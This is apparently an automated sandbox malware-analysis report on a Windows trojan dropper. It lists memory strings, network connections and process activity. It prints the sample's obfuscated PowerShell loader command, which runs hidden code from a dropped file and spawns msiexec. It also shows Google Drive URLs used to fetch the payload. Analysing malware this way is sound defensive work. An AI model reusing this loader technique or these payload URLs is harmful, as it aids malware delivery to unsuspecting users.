      Source: msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2965886628.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B8
      Source: msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BA
      Source: msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BH
      Source: msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BI
      Source: msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BMI
      Source: msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BMicroso
      Source: msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BygCjYRh_925Uq_B
      Source: msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BygCjYRh_925Uq_Bry
      Source: msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2965886628.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000006.00000003.3209397332.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806850799.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330267381.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563255459.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934171610.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3451513369.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2965886628.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198385652.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/)
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934010910.00000000094F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3817345794.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
      Source: msiexec.exe, 00000006.00000003.2955279363.00000000094E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download-b
      Source: msiexec.exe, 00000006.00000003.2955279363.00000000094E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download/b
      Source: msiexec.exe, 00000006.00000003.2843221841.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download3b
      Source: msiexec.exe, 00000006.00000003.3087853249.00000000094FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=downloadnt
      Source: powershell.exe, 00000002.00000002.2689252044.0000000004676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2692845690.0000000005589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934010910.00000000094F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198339130.000000000953B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000006.00000003.2955279363.00000000094E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198339130.000000000953B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3198339130.000000000953B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934010910.00000000094F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934010910.00000000094F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934010910.00000000094F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000006.00000003.3076350806.00000000094F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2843221841.00000000094F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3934010910.00000000094F3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319829520.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3563221668.0000000009536000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3806812480.000000000953B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.5:49975 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.5:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.5:49980 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.5:49984 version: TLS 1.2
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00405139 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405139

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exeJump to dropped file
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004031DD EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004031DD
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004049760_2_00404976
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004064EC0_2_004064EC
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06E127602_2_06E12760
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06E179E02_2_06E179E0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06E1AE2D2_2_06E1AE2D
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06E179D02_2_06E179D0
      Source: ro7eoySJ9q.exeStatic PE information: invalid certificate
      Source: ro7eoySJ9q.exe, 00000000.00000000.2075847656.0000000000475000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs ro7eoySJ9q.exe
      Source: ro7eoySJ9q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.evad.winEXE@6/15@2/2
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00404430 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404430
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeFile created: C:\Users\user\AppData\Roaming\PolysulfonateJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeFile created: C:\Users\user\AppData\Local\Temp\nsq63FC.tmpJump to behavior
      Source: ro7eoySJ9q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: ro7eoySJ9q.exeReversingLabs: Detection: 60%
      Source: ro7eoySJ9q.exeVirustotal: Detection: 72%
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeFile read: C:\Users\user\Desktop\ro7eoySJ9q.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\ro7eoySJ9q.exe "C:\Users\user\Desktop\ro7eoySJ9q.exe"
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmophobia.SubString(72360,3);.$Referendumets($Aichmophobia)" Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
